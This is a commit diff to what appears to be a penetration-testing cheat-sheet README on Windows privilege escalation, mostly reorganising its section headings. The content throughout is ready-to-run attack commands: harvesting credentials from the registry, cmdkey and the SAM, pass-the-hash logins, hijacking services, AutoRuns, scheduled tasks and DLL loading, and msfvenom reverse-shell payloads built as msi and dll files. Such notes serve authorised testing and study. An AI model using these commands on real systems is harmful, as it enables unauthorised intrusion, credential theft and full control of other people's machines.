Update README.md
This commit is contained in:
Joe Totes
209
README.md
209
README.md
@@ -1103,6 +1103,10 @@ service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off')
|
||||
|
||||
#### Credential Access
|
||||
|
||||
#### Credentials from Registry
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#######################################################################
|
||||
##### 1. Credentials from registry ####################################
|
||||
@@ -1120,7 +1124,13 @@ reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
|
||||
|
||||
# On Kali, we can use the winexe command to spawn a shell using these credentials
|
||||
winexe -U '{USER}%{PASS}' //{RHOST} cmd.exe
|
||||
```
|
||||
#### Credentials from Saved Creds (cmdkey)
|
||||
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
|
||||
#########################################################################
|
||||
#### 2. Credentials from cmdkey #########################################
|
||||
@@ -1137,7 +1147,9 @@ C:\PrivEsc\savecred.bat
|
||||
|
||||
# We can use the saved credential to run any command as the admin user
|
||||
runas /savecred /user:{admin} {C:\PrivEsc\reverse.exe}
|
||||
```
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 3. Credentials from configuration files ############################
|
||||
#########################################################################
|
||||
@@ -1150,7 +1162,13 @@ dir /s *pass* == *.config
|
||||
|
||||
# Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt
|
||||
findstr /si password *.xml *.ini *.txt
|
||||
```
|
||||
|
||||
#### SAM Creds
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 4. Credentials from SAM ############################################
|
||||
#########################################################################
|
||||
@@ -1179,6 +1197,8 @@ pth-winexe --system -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc
|
||||
|
||||
#### Exploits
|
||||
|
||||
|
||||
|
||||
<br />
|
||||
|
||||
[Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
|
||||
@@ -1201,9 +1221,13 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
|
||||
|
||||
##### Services
|
||||
|
||||
##### Insecure Service Permissions
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 1. Insecure Service Properties #####################################
|
||||
#### Insecure Service Permissions #####################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1223,9 +1247,15 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
|
||||
|
||||
# Start a service:
|
||||
net start {SERVICE}
|
||||
```
|
||||
#### Unquoted Service Path
|
||||
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
##### 2. Unquoted Service Path ##########################################
|
||||
##### Unquoted Service Path ##########################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1242,9 +1272,16 @@ copy reverse.exe {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\Commo
|
||||
|
||||
# Start a service:
|
||||
net start {SERVICE}
|
||||
```
|
||||
|
||||
|
||||
#### Weak Registry Permissions
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 3. Weak Registry Permissions #######################################
|
||||
#### Weak Registry Permissions #######################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1269,10 +1306,16 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND
|
||||
|
||||
# Start the service:
|
||||
net start regsvc
|
||||
```
|
||||
|
||||
#### Insecure Service Executables
|
||||
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
##### 4. Insecure Service Executables (File Permissions: Everyone) ######
|
||||
##### Insecure Service Executables ####################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1293,9 +1336,90 @@ Rename-Item "C:\Program Files\Microvirt\MEmu\MemuService.exe" "C:\Program Files\
|
||||
# Start the service
|
||||
net start filepermsvc
|
||||
Restart-Computer
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
#### AutoRuns
|
||||
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 5. DLL Hijacking ###################################################
|
||||
#### AutoRuns ########################################################
|
||||
#########################################################################
|
||||
|
||||
# Requires computer restart for priv esc.
|
||||
|
||||
# Winpeas Enumeration
|
||||
.\winPEASany.exe quiet applicationsinfo
|
||||
|
||||
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
||||
|
||||
# Use accesschk.exe to verify the permissions on each one
|
||||
.\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
|
||||
|
||||
# Copy our reverse shell executable to overwrite the AutoRun executable:
|
||||
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
||||
```
|
||||
|
||||
##### Always Install Elevated
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### AlwaysInstallElevated ###########################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration to see if both registry values are set
|
||||
.\winPEASany.exe quiet windowscreds
|
||||
|
||||
# Manual Enumeration
|
||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
|
||||
# Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f msi -o reverse.msi
|
||||
|
||||
# Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit
|
||||
msiexec /quiet /qn /i C:\users\public\downloads\reverse.msi
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
##### Scheduled Tasks
|
||||
|
||||
#### Scheduled Tasks
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### Scheduled Tasks #################################################
|
||||
#########################################################################
|
||||
|
||||
# Unfortunately, there is no easy method for enumerating custom tasks that belong to other users as a low privileged user account. Often we have to rely on other clues, such as finding a script or log file that indicates a scheduled task is being run.
|
||||
|
||||
# List all scheduled tasks your user can see:
|
||||
schtasks /query /fo LIST /v
|
||||
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||
|
||||
# Inspect interesting scripts
|
||||
type C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Check Permissions for write access on script
|
||||
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Use echo to append a call to our reverse shell executable to the end of the script
|
||||
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
|
||||
```
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### DLL Hijacking ###################################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1327,81 +1451,6 @@ msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP ADDRESS} LPORT={PORT} -f dll
|
||||
net stop dllsvc
|
||||
net start dllsvc
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
##### AutoRuns
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 1. AutoRuns ########################################################
|
||||
#########################################################################
|
||||
|
||||
# Requires computer restart for priv esc.
|
||||
|
||||
# Winpeas Enumeration
|
||||
.\winPEASany.exe quiet applicationsinfo
|
||||
|
||||
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
||||
|
||||
# Use accesschk.exe to verify the permissions on each one
|
||||
.\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
|
||||
|
||||
# Copy our reverse shell executable to overwrite the AutoRun executable:
|
||||
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
||||
```
|
||||
|
||||
##### Always Install Elevated
|
||||
|
||||
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 2. AlwaysInstallElevated ###########################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration to see if both registry values are set
|
||||
.\winPEASany.exe quiet windowscreds
|
||||
|
||||
# Manual Enumeration
|
||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
|
||||
# Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f msi -o reverse.msi
|
||||
|
||||
# Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit
|
||||
msiexec /quiet /qn /i C:\users\public\downloads\reverse.msi
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
##### Scheduled Tasks
|
||||
|
||||
```ps1
|
||||
|
||||
#########################################################################
|
||||
#### 1. Scheduled Tasks #################################################
|
||||
#########################################################################
|
||||
|
||||
# Unfortunately, there is no easy method for enumerating custom tasks that belong to other users as a low privileged user account. Often we have to rely on other clues, such as finding a script or log file that indicates a scheduled task is being run.
|
||||
|
||||
# List all scheduled tasks your user can see:
|
||||
schtasks /query /fo LIST /v
|
||||
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||
|
||||
# Inspect interesting scripts
|
||||
type C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Check Permissions for write access on script
|
||||
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Use echo to append a call to our reverse shell executable to the end of the script
|
||||
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user